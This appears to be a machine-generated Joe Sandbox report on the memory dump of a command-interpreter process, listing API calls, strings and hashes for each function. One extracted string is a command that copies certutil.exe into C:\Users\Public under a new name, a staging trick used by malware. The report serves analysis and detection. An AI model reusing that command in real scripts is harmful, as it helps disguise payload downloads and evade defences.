                                                                                                    • Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                  • String ID: <noalias>$CMD.EXE
                                                                                                  • API String ID: 1161012917-1690691951
                                                                                                  • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                  • Instruction ID: 253676cc49d2c9babcd89e64f2ba9a17e29f725fe26a57773f57ce8ce22f4cec
                                                                                                  • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                  • Instruction Fuzzy Hash: 9D91A322B086428AFF44BB61E4201BDBAA0BF45B56FE54179DD0E17AD5DFBCA845C330
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E3578: _get_osfhandle.MSVCRT ref: 00007FF7823E3584
                                                                                                    • Part of subcall function 00007FF7823E3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E359C
                                                                                                    • Part of subcall function 00007FF7823E3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35C3
                                                                                                    • Part of subcall function 00007FF7823E3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35D9
                                                                                                    • Part of subcall function 00007FF7823E3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E35ED
                                                                                                    • Part of subcall function 00007FF7823E3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7823D32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7823E3602
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823D32F3
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7823D32A4), ref: 00007FF7823D3309
                                                                                                  • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7823D3384
                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F11DF
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 611521582-0
                                                                                                  • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                  • Instruction ID: 1f96b0be1bc0fbc65c5172fdcf53d680209f55bea0d52b595a5e916599b7f084
                                                                                                  • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                  • Instruction Fuzzy Hash: 12A1A522B0861286FB14AB62A4142BDFBA1FB89756FA45039CD0E47B50DFBCE845C620
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                  • String ID: \\?\
                                                                                                  • API String ID: 628682198-4282027825
                                                                                                  • Opcode ID: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                  • Instruction ID: 9c56e1c57cdc527f6e395b9d0bbd6a9f5c4e8dead4f74706cb01d93fc2b76a9c
                                                                                                  • Opcode Fuzzy Hash: bfecd11a4866ca550013cb8df7d01d0eb9b862476b4829b349704babc3ba77e1
                                                                                                  • Instruction Fuzzy Hash: 5DE1D526B0878296EF61AF20D8643F9A7A0FB4474AFA04179DA4E47BD4DF7CE545C320
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 16309207-0
                                                                                                  • Opcode ID: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                  • Instruction ID: c82e7cb4c0b43138254a2e394279048f95187c7d60ef0fef2af6a43692c14997
                                                                                                  • Opcode Fuzzy Hash: aeb120db068727e28786c75b5313561eaf1c3474a7666ce33f66a1440c033bc1
                                                                                                  • Instruction Fuzzy Hash: 6422E462704B8296EF64AF20E8642F9B7A1FF48786FA04179DA0E07B95DFBCD545C310
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                  • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                  • API String ID: 3863671652-4137775220
                                                                                                  • Opcode ID: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
                                                                                                  • Instruction ID: b41e95134c408b5fea2ccd10206b3e9be2ff45cbe1350f38255ea72f994e4182
                                                                                                  • Opcode Fuzzy Hash: b52512778d22154e6a2ef45f8ba4ccb715e673a687fadbad016111a197e875a1
                                                                                                  • Instruction Fuzzy Hash: C4E1C066A0924291FAA0BB15E4683B8F6A0BF89742FF44479DD1D03AD1DFBCE845C330
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                  • String ID: $Application$System
                                                                                                  • API String ID: 3538039442-1881496484
                                                                                                  • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                  • Instruction ID: 32098c014e345cc6cc3d9bbb17c95a8a9f933a78b55aa1ecc746a82d7de45fe2
                                                                                                  • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                  • Instruction Fuzzy Hash: C251D332B08B4193EB619B15F41467AFAA1FB89B46F948138DE4E03B54DF7CE845CB20
                                                                                                  APIs
                                                                                                  • longjmp.MSVCRT(?,?,00000000,00007FF7823F048E), ref: 00007FF7823FDA58
                                                                                                  • memset.MSVCRT ref: 00007FF7823FDAD6
                                                                                                  • memset.MSVCRT ref: 00007FF7823FDAFC
                                                                                                  • memset.MSVCRT ref: 00007FF7823FDB22
                                                                                                    • Part of subcall function 00007FF7823E3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823FEAC5,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823E3A56
                                                                                                    • Part of subcall function 00007FF7823D5194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823D51C4
                                                                                                    • Part of subcall function 00007FF7823E823C: FindFirstFileExW.KERNELBASE ref: 00007FF7823E8280
                                                                                                    • Part of subcall function 00007FF7823E823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823E829D
                                                                                                    • Part of subcall function 00007FF7823E01B8: _get_osfhandle.MSVCRT ref: 00007FF7823E01C4
                                                                                                    • Part of subcall function 00007FF7823E01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7823EE904,?,?,?,?,00000000,00007FF7823E3491,?,?,?,00007FF7823F4420), ref: 00007FF7823E01D6
                                                                                                    • Part of subcall function 00007FF7823D4FE8: _get_osfhandle.MSVCRT ref: 00007FF7823D5012
                                                                                                    • Part of subcall function 00007FF7823D4FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5030
                                                                                                  • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FDDB0
                                                                                                    • Part of subcall function 00007FF7823D59E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5A2E
                                                                                                    • Part of subcall function 00007FF7823D59E4: _open_osfhandle.MSVCRT ref: 00007FF7823D5A4F
                                                                                                  • _get_osfhandle.MSVCRT ref: 00007FF7823FDDEB
                                                                                                  • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FDDFA
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE204
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE223
                                                                                                  • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823FE242
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                  • String ID: %9d$%s$~
                                                                                                  • API String ID: 3651208239-912394897
                                                                                                  • Opcode ID: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                  • Instruction ID: 372b35b016aa01b3802fb0b5f010befd46f02f981e17c8e8f4bfc376b16fae4d
                                                                                                  • Opcode Fuzzy Hash: bd92ea359e7dfbf02f7d23f55cbe5c15862248cc3031b8413fe66a0113feaca6
                                                                                                  • Instruction Fuzzy Hash: 4442D732A0868286EB64BF21E8642FDB3A0FB85746FE00079D64D47E99DFBCD545C720
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                  • String ID: COPYCMD$\
                                                                                                  • API String ID: 3989487059-1802776761
                                                                                                  • Opcode ID: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                  • Instruction ID: 0be6c8a049f1a91011ad49935cf0f2b3526e5bd633ce7819a7ba7eddc132b3a9
                                                                                                  • Opcode Fuzzy Hash: d8d0bfbfdfe82cdd3103f4725bc29693bb562c2c5d4d39e0cb153c4cce5fb559
                                                                                                  • Instruction Fuzzy Hash: 27F1D665B0874681FF50BB15E4242BAE7A0FF45B89FA44079CE4E47B94DEBCE845C710
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                  • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                  • API String ID: 55602301-2548490036
                                                                                                  • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                  • Instruction ID: 635e49bf972dad7b3a6394bbd817fc767bdf94a767e3966d1db3a32fd8307c9a
                                                                                                  • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                  • Instruction Fuzzy Hash: EBA1CA76A18742E6EB10AB10E4502B9F7A5FB44765FE00179DA4E03E94EFBCE549C730
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3935429995-0
                                                                                                  • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                  • Instruction ID: 26e90170ca5d087d661979726cc806109d4d9a88d1574ea29b279d86d723696f
                                                                                                  • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                  • Instruction Fuzzy Hash: 3E61C226A18A52C6E790AF22A404579FBA0FF89F56FA58135DE4F43750DFBCD881C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                  • Instruction ID: e627abeea9754e155e30ef84e43c5f113da32430a78ca2d7823b4ac0f3d0a939
                                                                                                  • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                  • Instruction Fuzzy Hash: 8F91073270868186EF65AF25E4243FCBAA0FB44746FA04179DA8E47B94DF7CD444C320
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _get_osfhandlememset$wcschr
                                                                                                  • String ID: DPATH
                                                                                                  • API String ID: 3260997497-2010427443
                                                                                                  • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                  • Instruction ID: 8092eaa2e293aba69601c2bf676392a1cca870895dbee71ac8193f0f4a170218
                                                                                                  • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                  • Instruction Fuzzy Hash: 6FD1E476A0864292EB20BB21D4242BDA3A1FF44B96FA44279D91D47FD4DFBCE845C360
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                  • String ID: @P
                                                                                                  • API String ID: 1801357106-3670739982
                                                                                                  • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                  • Instruction ID: 1c6b5600da51185aa26a912f01a0e7fcf59bfadc6024babe589057a24df95dcd
                                                                                                  • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                  • Instruction Fuzzy Hash: 9E417D32B04A41DBE710AF65E4503EDBBA0FB89749F948275DA0D43A98DFB8D948C760
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$BufferConsoleInfoScreen
                                                                                                  • String ID:
                                                                                                  • API String ID: 1034426908-0
                                                                                                  • Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                  • Instruction ID: 317f39b9dbddab131e93e65f8fa3843e261fadb0828b2fed1753800c3bf3156a
                                                                                                  • Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
                                                                                                  • Instruction Fuzzy Hash: 5AF1E432B087828AEB60EF21D8642F9B7A0FF45785FA04179DA4E47A95DF7CE544C710
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
